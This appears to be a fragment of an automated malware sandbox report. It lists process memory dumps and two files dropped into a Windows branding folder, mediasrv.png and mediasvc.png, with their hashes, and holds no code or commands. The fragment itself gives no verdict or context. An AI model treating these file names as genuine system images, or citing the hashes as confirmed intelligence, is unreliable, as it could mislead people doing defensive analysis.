memory/4756-151-0x0000027731CD8000-0x0000027731CD9000-memory.dmp

memory/4756-152-0x0000027732DB0000-0x0000027732DB1000-memory.dmp

memory/4756-153-0x0000027733140000-0x0000027733141000-memory.dmp

memory/5056-160-0x0000000000000000-mapping.dmp

memory/5056-167-0x00000287D6F30000-0x00000287D6F32000-memory.dmp

memory/5056-168-0x00000287D6F33000-0x00000287D6F35000-memory.dmp

memory/5056-176-0x00000287D6F36000-0x00000287D6F38000-memory.dmp

memory/5056-199-0x00000287D6F38000-0x00000287D6F3A000-memory.dmp

memory/4280-206-0x0000000000000000-mapping.dmp

memory/4280-216-0x0000023F8BF90000-0x0000023F8BF92000-memory.dmp

memory/4280-218-0x0000023F8BF93000-0x0000023F8BF95000-memory.dmp

memory/64-246-0x0000000000000000-mapping.dmp

memory/4280-258-0x0000023F8BF96000-0x0000023F8BF98000-memory.dmp

memory/64-259-0x00000217CC920000-0x00000217CC922000-memory.dmp

memory/64-260-0x00000217CC923000-0x00000217CC925000-memory.dmp

memory/64-296-0x00000217CC928000-0x00000217CC92A000-memory.dmp

memory/64-295-0x00000217CC926000-0x00000217CC928000-memory.dmp

memory/3852-306-0x0000000000000000-mapping.dmp

memory/4040-307-0x0000000000000000-mapping.dmp

memory/4072-308-0x0000000000000000-mapping.dmp

memory/4424-345-0x0000000000000000-mapping.dmp

memory/4444-346-0x0000000000000000-mapping.dmp

memory/1648-349-0x0000000000000000-mapping.dmp

memory/2892-350-0x0000000000000000-mapping.dmp

memory/4588-351-0x0000000000000000-mapping.dmp

memory/4596-352-0x0000000000000000-mapping.dmp

memory/4240-353-0x0000000000000000-mapping.dmp

memory/4576-354-0x0000000000000000-mapping.dmp

memory/4568-355-0x0000000000000000-mapping.dmp

memory/4704-356-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 0750828e5a80dae0280c43945332e145
SHA1 fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c
SHA256 637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947
SHA512 a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14

\Windows\Branding\mediasvc.png

MD5 0941efccfdbde6a619081456be071102
SHA1 4d9079f335bfdb4e88e022ffdd2193c4561f099d
SHA256 99dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281
SHA512 bbb587471dec6beae7852ae2ee1fff0efb26ce57ab69dbaf4385c965bf09a31be60c67951e52f488866daa0effab715e6b1a0aca5b02a7fdcc5dd586d84d56ab

memory/4920-359-0x0000000000000000-mapping.dmp

memory/4948-360-0x0000000000000000-mapping.dmp

memory/4996-361-0x0000000000000000-mapping.dmp

memory/5016-362-0x0000000000000000-mapping.dmp

memory/4100-363-0x0000000000000000-mapping.dmp

memory/3912-364-0x0000000000000000-mapping.dmp

memory/3560-365-0x0000000000000000-mapping.dmp

memory/3364-366-0x0000000000000000-mapping.dmp

memory/3040-367-0x0000000000000000-mapping.dmp

memory/4252-368-0x0000000000000000-mapping.dmp

memory/4128-369-0x0000000000000000-mapping.dmp

memory/2232-370-0x0000000000000000-mapping.dmp

memory/4264-371-0x0000000000000000-mapping.dmp

memory/668-372-0x0000000000000000-mapping.dmp

memory/4036-373-0x0000000000000000-mapping.dmp

memory/4184-374-0x0000000000000000-mapping.dmp

memory/4184-383-0x0000020106E10000-0x0000020106E12000-memory.dmp

memory/4184-384-0x0000020106E13000-0x0000020106E15000-memory.dmp

memory/4184-390-0x0000020106E16000-0x0000020106E18000-memory.dmp

memory/4184-441-0x0000020106E18000-0x0000020106E19000-memory.dmp

memory/3600-454-0x0000000000000000-mapping.dmp

memory/3676-455-0x0000000000000000-mapping.dmp